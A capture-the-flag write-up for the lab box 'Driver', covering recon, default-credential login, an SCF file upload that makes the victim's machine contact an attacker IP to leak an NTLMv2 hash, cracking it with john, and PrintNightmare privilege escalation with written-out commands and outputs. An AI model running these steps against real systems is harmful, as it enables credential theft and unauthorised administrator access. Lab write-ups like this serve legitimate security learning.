Driver

Write Up for the easy box Driver

Driver


Its got a cool printer as its icon and its named 'driver', so I'm going in with the assumption its probably something to do with printers and their drivers.

As always, I started off by adding the IP to /etc/hosts under the alias driver.htb and start the VPN to check out the webpage.

I'm greeted with a login form (not an HTML login form, more like a popup)
I don't know what the user and password is so its time to run nmap + gobuster

Recon

gobuster dir -u driver.htb -w /usr/share/wordlists/dirb/common.txt -q
/images               (Status: 301) [Size: 148] [--> http://driver.htb/images/]
/Images               (Status: 301) [Size: 148] [--> http://driver.htb/Images/]
/index.php            (Status: 401) [Size: 20]

Looks like gobuster returned the directories 'images' and 'index.php'.

Trying to go to driver.htb/images results in a 403.
/index.php results in the login form again.

So that's a dead end

nmap:
nmap -A -p- driver.htb
Nmap scan report for driver.htb (10.10.11.106)
Host is up (0.039s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|http-title: Site doesn't have a title (text/html;charset=UTF-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-02-08T04:07:50
|_  start_date: 2022-02-07T11:53:13
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: mean: 6h59m54s, deviation: 0s, median: 6h59m53s

Looks like there's services running on 80, 135, 445, and 5985.

80 is for the webpage, we already knew it was there
135 is for RPC, which after a google search, is a remote access tool for windows.
445 is for Samba, a remote file system.
and 5985 which is something Microsoft related.

Because the Samba port is open we can try to login to the Samba server with an anonymous login, maybe it won't need a password.

smbclient //driver.htb/ --user anonymous

It asks for a password, which it wouldn't if there was an anonymous login.

Welp, that's another dead end. I can try going down the rabbit hole of RPC but I feel like I should have access to the webpage since this is only an easy box.

I returned to the webpage to try some common login creds.

user:password,admin:password,test:test,admin:admin

admin:admin worked

bruh

Well now that were in, we can do some more recon.

Recon pt 2

Looks like were on some page called "MFP Firmware Update Center"
Theres also a nice picture of a printer that looks scarily similar to the one my school uses (lol).

Anyways, I right click and opened the image in a new tab to see where its stored and sure enough, its stored in /images as ricoh.png. I tried to navigate to /images and I'm still denied access.

I returned to the main page and clicked the top buttons. Only "Firmware Updates" goes somewhere but its a file upload page!

Immediately I think I need to upload a reverse shell or something.

The top text says that the "testing team will review the uploads manually and initiate the testing soon."

This sounds familiar to a TryHackMe room I previously have done (I think it was an XSS room??) that involved stealing an admins cookie.
So this might be similar to that.

I downloaded a picture of a cookie from google.com to test what can be uploaded and uploaded cookie.png.

I clicked upload and notice the URL changed from fw_up.php to fw_up.php?msg=ERR

That doesn't sound good so it probably doesn't accept PNGs.

In Wappalyzer (and the .php in the URL) it can be seen that the webpage is made in PHP, so I went on google.com and got a PHP reverse shell.

I edited the script to run to my VPN's IP (found using 'ip a') and on port 4444 (I like that port) and set up a netcat listener on port 4444.

I uploaded the PHP script and got ?msg=SUCCESS in the URL, so the site does accept PHP scripts! My netcat listener didn't do anything though. It needs to be ran by something, usually you, but I can't find any uploads page or anything similar.

Back to the drawing board-what do we know?
The web app runs RPC, Samba, and some Microsoft service.
We can upload certain files, "printer firmware," and a 'testing team' will probably view them.

So lets try getting something with Samba (I still don't want to go into an RPC rabbit hole).

Foothold

I did this part with my friend Phil, so he went on enumerating and trying to find a hidden webpage by mounting a Samba share.

I felt that something else could be done with Samba.

I ended up literally googling 'smb share attacks' and the first option was about something called SCF file attacks.

https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

Apparently, this attack can be used to gain the hash of a user's password when they run a file, and send that information to host.

That sounds good, its very similar to that aforementioned TryHackMe XSS room.

So essentially, just make a text file with the following contents:

[Shell]
Command=2
IconFile=\X.X.X.X\share\test.ico
[Taskbar]
Command=ToggleDesktop

Obviously, replacing 'X.X.X.X' with your VPN IP.

Save it as @.scf

It can be named anything, but has to end with .scf to tell Windows (the web app's OS is Windows, according to Wappalyzer) and adding an @ brings it to the top of the site tester's file system so they see it first.

Now lets hold on to that file.

The blog post says to use a python program called Responder, so clone the repo:

https://github.com/SpiderLabs/Responder

Once its downloaded, run python Responder.py, get hit with an error with something about print, run python2 Responder.py, get hit with an error saying to run it with sudo, and finally run the full command the blog writes.

sudo python2 Responder.py -wrf --lm -v -I tun0

The blog has eth0 instead of tun0, but if using OpenVPN, the NIC being used is tun0.

This starts the responder listener.

Upload the scf file to the site in the upload firmware page and wait for the site's tester to open it.

Wow :o we got something from a user named 'tony'.

And we get their password hash as well, as an NTLMv2 Hash. (I'm cutting off parts of the hash to save space)

[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:1122334455667788:D1C032953832E9F0C51E34FA

Thanks Tony, ya shmuck.

Well now we can try to crack the hash using john or hashcat.

I couldn't (and was too lazy to) get the drivers for my laptops GPU to work for hashcat (THANKS NVIDIA) so I used john.

Create a text file for Tony's hash:

echo "tony::DRIVER:1122334455667788:34D8C71DB10ACA9272FE11DD53EEF69B:0101000000000000906F933E761A

And crack it with john

john --show hash
tony:liltony:DRIVER:1122334455667788:34D8C71DB10ACA9272FE11DD53EEF69B:0101000000000000906F93
1 password hash cracked, 0 left

Looks like Tony's password is liltony

great password dude

Anyways, I tried logging in with these creds on the site to maybe get access to /images but it didn't work. So lets try enumerating the Samba service.

To do this, I used smbmap

https://github.com/ShawnDEvans/smbmap

With the .py script downloaded, run

python smbmap.py

It lists the options to choose from. So now, with the correct options,

python smbmap.py -u tony -p liltony -H driver.htb
[+] IP: driver.htb:445  Name: unknown                   Status: Authenticated
Disk                                                    Permissions     Comment
----                                                    -----------     -------
ADMIN$                                                  NO ACCESS       Remote Admin
C$                                                      NO ACCESS       Default share
IPC$                                                    READ ONLY       Remote IPC

Looks like the only share we have access to is something called IPC$

So lets log into it with smbclient.

smbclient //driver.htb/IPC$ --user tony%liltony

You can then run 'help' to see what you can do.

Try some commands, and you'll quickly see that pretty much nothing works or at least works correctly.

This part was the most frustrating for me and Phil and took probably an hour to figure out what to do next.

--A LONG TIME LATER--

Eventually we started to go back to the nmap services we found at the start.

Phil found that the service on 5985 (just a google search) was winRM, or Windows Remote Management.

So I just googled "winrm exploit" and found this github page:

https://github.com/Hackplayers/evil-winrm

It sounds edgy and has an edgy picture (awesome) so I knew I wanted this to work.

I cloned the repo

git clone https://github.com/Hackplayers/evil-winrm

and also added the ruby bin director to my path with

export PATH="/home/River/.local/share/gem/ruby/3.0.0/bin/:$PATH"

^this wont work for you though, you have to change it to wherever your ruby directory is.

I tried the first installation method.
It didnt work

So I tried the second method.

That also resulted in an error

So I tried the third method and it worked.

bundle exec evil-winrm.rb -i driver.htb -u tony -p 'liltony'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\tony\Documents>

So we finally have a foothold

Lets grab the user flag

On Windows machines they're usually on the user's desktop.

cd C:\Users\tony\Desktop
dir
Directory: C:\Users\tony\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/7/2022   3:53 AM             34 user.txt

theres the user flag! read it with

type user.txt

Privilege Escalation

So we gotta start the priv esc.

This part, Phil and I cheated a little at.

I'm a little lazy so I'll update this with a correct route if I care enough but when Phil and I were on the box, there was a file on the desktop with the exact CVE that would be useful to us.

However, it could've been deduced from the name of the box, the printer page, and the printer picture (ricoh) as well.

But we have the exploit, so thanks for the hint kind stranger, take some reddit gold.

The CVE was CVE-2021-1675, so I googled the CVE and ended up finding this page:

https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html

The exploit is called printnightmare, which goes hard so I wanted to try that out.

This blog post pretty much gives a step by step guide of what to do exactly.

First you have to clone the vulnerabiity repo with

git clone https://github.com/calebstewart/CVE-2021-1675

This is where I found out that evil-winrm has a neat function called upload that lets you easily upload files to the machine.

So upload the ps1 script from the repo with

upload /path/to/CVE-2021-1675.ps1

then in the shell, run

Import-Module .\CVE-2021-1675.ps1

with the module imported we have access to a new command:

Invoke-Nightmare

This is the coolest sounding powershell command I have ever typed

Anyways, invoke-nightmare allows us to make a user with admin privileges.

So lets do that with

Invoke-Nightmare -NewUser "joe" -NewPassword "joe"

We have now created a new admin, joe, with the password joe

So lets get out of this shell and log back in as joe. ctrl+c and y to exit and use evil-winrm but with joe.

bundle exec evil-winrm.rb -i driver.htb -u joe -p 'joe'

Now we should be able to view the administrator user's desktop and get the root flag.

Evil-WinRM PS C:\Users\joe\Documents> cd C:\Users\Administrator\Desktop
Evil-WinRM PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/7/2022   3:53 AM          34 root.txt

there it is

type root.txt

We now have the root flag.

This box was pretty meh

I didn't like having to guess the admin:admin in the beginning, that wasted around 15 minutes of time.

I didn't like going down a huge Samba rabbit hole and not even being able to use the Samba share.

and finding the printnightmare exploit without using context clues of the boxs name and picture wouldve been quite annoying.

IDK, this wasn't my favorite box but it definitely was a box, lol